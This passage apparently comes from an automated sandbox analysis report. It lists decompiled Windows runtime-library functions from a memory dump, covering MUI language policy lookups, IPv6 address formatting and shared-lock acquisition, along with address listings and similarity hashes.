					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00948460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0092E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0094718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00948460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0094718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00948460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00948460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00948460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0094718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0092E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00922340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0093E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0092E2A8(_t322,  &_v68, _v16);
								if(E00945553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0093E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0092E2A8(_t322,  &_v68, _t236);
								if(E00945553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0094718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0092E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00922340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0093E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0092E2A8(_v12,  &_v68, _v16);
							if(E00945553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0093E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0092E2A8(_t322,  &_v68, _t269);
							if(E00945553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0094718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0092E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00922340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0093E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0092E2A8(_v12,  &_v68, _v16);
						if(E00945553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0093E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0092E2A8(_t322,  &_v68, _t296);
						if(E00945553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0092E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                    0x00948788
                                                                                                                                                    0x00948788
                                                                                                                                                    0x00948791
                                                                                                                                                    0x00948794
                                                                                                                                                    0x00948798
                                                                                                                                                    0x0094879b
                                                                                                                                                    0x0094879e
                                                                                                                                                    0x009487a1
                                                                                                                                                    0x009487a4
                                                                                                                                                    0x009487a7
                                                                                                                                                    0x009487aa
                                                                                                                                                    0x009487af
                                                                                                                                                    0x00991ad3
                                                                                                                                                    0x00948b0a
                                                                                                                                                    0x00948b0d
                                                                                                                                                    0x00948b13
                                                                                                                                                    0x00948b19
                                                                                                                                                    0x00948b1f
                                                                                                                                                    0x00948b25
                                                                                                                                                    0x00948b2b
                                                                                                                                                    0x00948b31
                                                                                                                                                    0x00948b37
                                                                                                                                                    0x00948b3d
                                                                                                                                                    0x00948b46
                                                                                                                                                    0x00948b46
                                                                                                                                                    0x009487c6
                                                                                                                                                    0x009487d0
                                                                                                                                                    0x00991ae0
                                                                                                                                                    0x00991ae6
                                                                                                                                                    0x00991af8
                                                                                                                                                    0x00991af8
                                                                                                                                                    0x00991afd
                                                                                                                                                    0x00991afe
                                                                                                                                                    0x00991b01
                                                                                                                                                    0x00991b06
                                                                                                                                                    0x00991b06
                                                                                                                                                    0x009487d6
                                                                                                                                                    0x009487f2
                                                                                                                                                    0x009487f7
                                                                                                                                                    0x00948807
                                                                                                                                                    0x0094880a
                                                                                                                                                    0x0094880f
                                                                                                                                                    0x00948810
                                                                                                                                                    0x00948813
                                                                                                                                                    0x00948818
                                                                                                                                                    0x00948818
                                                                                                                                                    0x0094882c
                                                                                                                                                    0x00948831
                                                                                                                                                    0x00948838
                                                                                                                                                    0x00948908
                                                                                                                                                    0x00948920
                                                                                                                                                    0x009489f0
                                                                                                                                                    0x00948a08
                                                                                                                                                    0x00948af6
                                                                                                                                                    0x00948af6
                                                                                                                                                    0x00948af8
                                                                                                                                                    0x00948afb
                                                                                                                                                    0x00991beb
                                                                                                                                                    0x00991beb
                                                                                                                                                    0x00948b04
                                                                                                                                                    0x00991bf8
                                                                                                                                                    0x00991c0e
                                                                                                                                                    0x00991c13
                                                                                                                                                    0x00991c16
                                                                                                                                                    0x00991c16
                                                                                                                                                    0x00991bf8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948b04
                                                                                                                                                    0x00948a0e
                                                                                                                                                    0x00948a11
                                                                                                                                                    0x00948a14
                                                                                                                                                    0x00948a15
                                                                                                                                                    0x00948a18
                                                                                                                                                    0x00948a22
                                                                                                                                                    0x00948b59
                                                                                                                                                    0x00948a28
                                                                                                                                                    0x00948a3c
                                                                                                                                                    0x00948a3c
                                                                                                                                                    0x00948a42
                                                                                                                                                    0x00991bb0
                                                                                                                                                    0x00991b11
                                                                                                                                                    0x00991b11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948a48
                                                                                                                                                    0x00948a51
                                                                                                                                                    0x00948a5b
                                                                                                                                                    0x00948a5e
                                                                                                                                                    0x00948a61
                                                                                                                                                    0x00948a69
                                                                                                                                                    0x00948a69
                                                                                                                                                    0x00948a6d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948a74
                                                                                                                                                    0x00948a7c
                                                                                                                                                    0x00948a7d
                                                                                                                                                    0x00948a91
                                                                                                                                                    0x00948a93
                                                                                                                                                    0x00948a93
                                                                                                                                                    0x00948a98
                                                                                                                                                    0x00948a9b
                                                                                                                                                    0x00948aa1
                                                                                                                                                    0x00948aa1
                                                                                                                                                    0x00948aa4
                                                                                                                                                    0x00948aaa
                                                                                                                                                    0x00948ab1
                                                                                                                                                    0x00948ac5
                                                                                                                                                    0x00948ac7
                                                                                                                                                    0x00948ac7
                                                                                                                                                    0x00948ac5
                                                                                                                                                    0x00948ace
                                                                                                                                                    0x00991bc9
                                                                                                                                                    0x00991bce
                                                                                                                                                    0x00991bd2
                                                                                                                                                    0x00991bd2
                                                                                                                                                    0x00948ad8
                                                                                                                                                    0x00948aeb
                                                                                                                                                    0x00948aeb
                                                                                                                                                    0x00948af0
                                                                                                                                                    0x00948af4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948af4
                                                                                                                                                    0x00948a42
                                                                                                                                                    0x00948926
                                                                                                                                                    0x00948929
                                                                                                                                                    0x0094892c
                                                                                                                                                    0x0094892d
                                                                                                                                                    0x00948930
                                                                                                                                                    0x00948935
                                                                                                                                                    0x0094893a
                                                                                                                                                    0x00948b51
                                                                                                                                                    0x00948940
                                                                                                                                                    0x00948954
                                                                                                                                                    0x00948954
                                                                                                                                                    0x0094895a
                                                                                                                                                    0x00991b63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948960
                                                                                                                                                    0x00948969
                                                                                                                                                    0x00948973
                                                                                                                                                    0x00948976
                                                                                                                                                    0x00948979
                                                                                                                                                    0x0094897e
                                                                                                                                                    0x00948981
                                                                                                                                                    0x00948981
                                                                                                                                                    0x00948986
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00991b6e
                                                                                                                                                    0x00991b74
                                                                                                                                                    0x00991b7b
                                                                                                                                                    0x00991b8f
                                                                                                                                                    0x00991b91
                                                                                                                                                    0x00991b91
                                                                                                                                                    0x00991b99
                                                                                                                                                    0x00991b9c
                                                                                                                                                    0x00991ba2
                                                                                                                                                    0x00991ba2
                                                                                                                                                    0x0094898c
                                                                                                                                                    0x00948992
                                                                                                                                                    0x00948999
                                                                                                                                                    0x009489ad
                                                                                                                                                    0x00991ba8
                                                                                                                                                    0x00991ba8
                                                                                                                                                    0x009489ad
                                                                                                                                                    0x009489b6
                                                                                                                                                    0x009489c8
                                                                                                                                                    0x009489cd
                                                                                                                                                    0x009489d0
                                                                                                                                                    0x009489d0
                                                                                                                                                    0x009489d6
                                                                                                                                                    0x009489e8
                                                                                                                                                    0x009489e8
                                                                                                                                                    0x009489ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009489ed
                                                                                                                                                    0x0094895a
                                                                                                                                                    0x0094883e
                                                                                                                                                    0x00948841
                                                                                                                                                    0x00948844
                                                                                                                                                    0x00948845
                                                                                                                                                    0x00948848
                                                                                                                                                    0x0094884d
                                                                                                                                                    0x00948852
                                                                                                                                                    0x00948b49
                                                                                                                                                    0x00948858
                                                                                                                                                    0x0094886c
                                                                                                                                                    0x0094886c
                                                                                                                                                    0x00948872
                                                                                                                                                    0x00991b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948878
                                                                                                                                                    0x00948881
                                                                                                                                                    0x0094888b
                                                                                                                                                    0x0094888e
                                                                                                                                                    0x00948891
                                                                                                                                                    0x00948896
                                                                                                                                                    0x00948899
                                                                                                                                                    0x00948899
                                                                                                                                                    0x0094889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00991b21
                                                                                                                                                    0x00991b27
                                                                                                                                                    0x00991b2e
                                                                                                                                                    0x00991b42
                                                                                                                                                    0x00991b44
                                                                                                                                                    0x00991b44
                                                                                                                                                    0x00991b4c
                                                                                                                                                    0x00991b4f
                                                                                                                                                    0x00991b55
                                                                                                                                                    0x00991b55
                                                                                                                                                    0x009488a4
                                                                                                                                                    0x009488aa
                                                                                                                                                    0x009488b1
                                                                                                                                                    0x009488c5
                                                                                                                                                    0x00991b5b
                                                                                                                                                    0x00991b5b
                                                                                                                                                    0x009488c5
                                                                                                                                                    0x009488ce
                                                                                                                                                    0x009488e0
                                                                                                                                                    0x009488e5
                                                                                                                                                    0x009488e8
                                                                                                                                                    0x009488e8
                                                                                                                                                    0x009488ee
                                                                                                                                                    0x00948900
                                                                                                                                                    0x00948900
                                                                                                                                                    0x00948905
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00948905

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 00948827
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 009487E6
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00948914
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 009489FC
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 009487C1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                    • Opcode ID: ea5729df122829a5e8794eeca1b69d3731786de75340a925a884ba8b3b814f86
                                                                                                                                                    • Instruction ID: eec668b6938623f9b9436ea9632081af0f4c1342fa2293b6c45c678ccf3bf1e6
                                                                                                                                                    • Opcode Fuzzy Hash: ea5729df122829a5e8794eeca1b69d3731786de75340a925a884ba8b3b814f86
                                                                                                                                                    • Instruction Fuzzy Hash: 9CF1E3B2D00219EFCF11EF99C981EEEBBB9FF48304F15446AE505A7211EB349A45DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009613CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                    			E009613CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00957707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x922926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00957707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x929cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00957707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00957707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00957707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00957707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                    0x009613d5
                                                                                                                                                    0x009613d9
                                                                                                                                                    0x009613dc
                                                                                                                                                    0x009613de
                                                                                                                                                    0x009613e1
                                                                                                                                                    0x009613e8
                                                                                                                                                    0x009613ee
                                                                                                                                                    0x0098e8fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098e921
                                                                                                                                                    0x0098e921
                                                                                                                                                    0x0098e928
                                                                                                                                                    0x0098e982
                                                                                                                                                    0x0098e98a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098e99a
                                                                                                                                                    0x0098e99e
                                                                                                                                                    0x0098e9a3
                                                                                                                                                    0x0098e9a8
                                                                                                                                                    0x0098e9b9
                                                                                                                                                    0x0098e978
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098e978
                                                                                                                                                    0x0098e98a
                                                                                                                                                    0x0098e92a
                                                                                                                                                    0x0098e931
                                                                                                                                                    0x0098e944
                                                                                                                                                    0x0098e944
                                                                                                                                                    0x0098e950
                                                                                                                                                    0x0098e954
                                                                                                                                                    0x0098e959
                                                                                                                                                    0x0098e95e
                                                                                                                                                    0x0098e963
                                                                                                                                                    0x0098e970
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098e975
                                                                                                                                                    0x0098e93b
                                                                                                                                                    0x0098e980
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098e980
                                                                                                                                                    0x0098e942
                                                                                                                                                    0x0098e94b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098e94b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0098e942
                                                                                                                                                    0x009613f4
                                                                                                                                                    0x009613f4
                                                                                                                                                    0x009613f9
                                                                                                                                                    0x009613fc
                                                                                                                                                    0x009613ff
                                                                                                                                                    0x00961406
                                                                                                                                                    0x0098e9cc
                                                                                                                                                    0x0098e9d2
                                                                                                                                                    0x0098e9d2
                                                                                                                                                    0x0098e9cc
                                                                                                                                                    0x0096140c
                                                                                                                                                    0x00961411
                                                                                                                                                    0x00961431
                                                                                                                                                    0x0096143a
                                                                                                                                                    0x0096143c
                                                                                                                                                    0x0096143f
                                                                                                                                                    0x0096143f
                                                                                                                                                    0x00961442
                                                                                                                                                    0x00961447
                                                                                                                                                    0x009614a8
                                                                                                                                                    0x009614ac
                                                                                                                                                    0x0098e9e2
                                                                                                                                                    0x0098e9e7
                                                                                                                                                    0x0098e9ec
                                                                                                                                                    0x0098ea05
                                                                                                                                                    0x0098ea05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00961449
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00961449
                                                                                                                                                    0x0096144c
                                                                                                                                                    0x00961459
                                                                                                                                                    0x00961462
                                                                                                                                                    0x00961469
                                                                                                                                                    0x0096146a
                                                                                                                                                    0x00961470
                                                                                                                                                    0x00961473
                                                                                                                                                    0x00961476
                                                                                                                                                    0x00961476
                                                                                                                                                    0x00961490
                                                                                                                                                    0x00961495
                                                                                                                                                    0x0096138e
                                                                                                                                                    0x00961390
                                                                                                                                                    0x00961397
                                                                                                                                                    0x00961398
                                                                                                                                                    0x00961399
                                                                                                                                                    0x009613a1
                                                                                                                                                    0x009613a4
                                                                                                                                                    0x009613a4
                                                                                                                                                    0x00961498
                                                                                                                                                    0x0096149c
                                                                                                                                                    0x0096149f
                                                                                                                                                    0x009614a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009614a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009614a4
                                                                                                                                                    0x00961413
                                                                                                                                                    0x00961415
                                                                                                                                                    0x00961416
                                                                                                                                                    0x00961419
                                                                                                                                                    0x0096141c
                                                                                                                                                    0x00961422
                                                                                                                                                    0x009613b7
                                                                                                                                                    0x009613bc
                                                                                                                                                    0x009613bf
                                                                                                                                                    0x009613bf
                                                                                                                                                    0x009613c2
                                                                                                                                                    0x00961424
                                                                                                                                                    0x00961424
                                                                                                                                                    0x00961424
                                                                                                                                                    0x00961427
                                                                                                                                                    0x0096142b
                                                                                                                                                    0x0096142c
                                                                                                                                                    0x0096142c
                                                                                                                                                    0x0096142c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0096141c
                                                                                                                                                    0x00961411

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                    • Opcode ID: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
                                                                                                                                                    • Instruction ID: ae4870abe607ce0fe14dde98dbd033f57bc04b9360ac77b99d088b838ca420db
                                                                                                                                                    • Opcode Fuzzy Hash: 4972c33cf10492ea9ecc1496663867f614997e95921c70ef63e4757d90bf4df7
                                                                                                                                                    • Instruction Fuzzy Hash: 966157B1904655AACF34DF99C8908BEBBB9EFD4301B18C42EF4DA47680D775AA40DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00960554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                    			E00960554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a001c0;
									_push(_t144);
									_push(0);
									_t51 = E0091F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00964FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00973F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00973F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E009A217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00973F92();
									_t158 = _t160 + 0xc;
								}
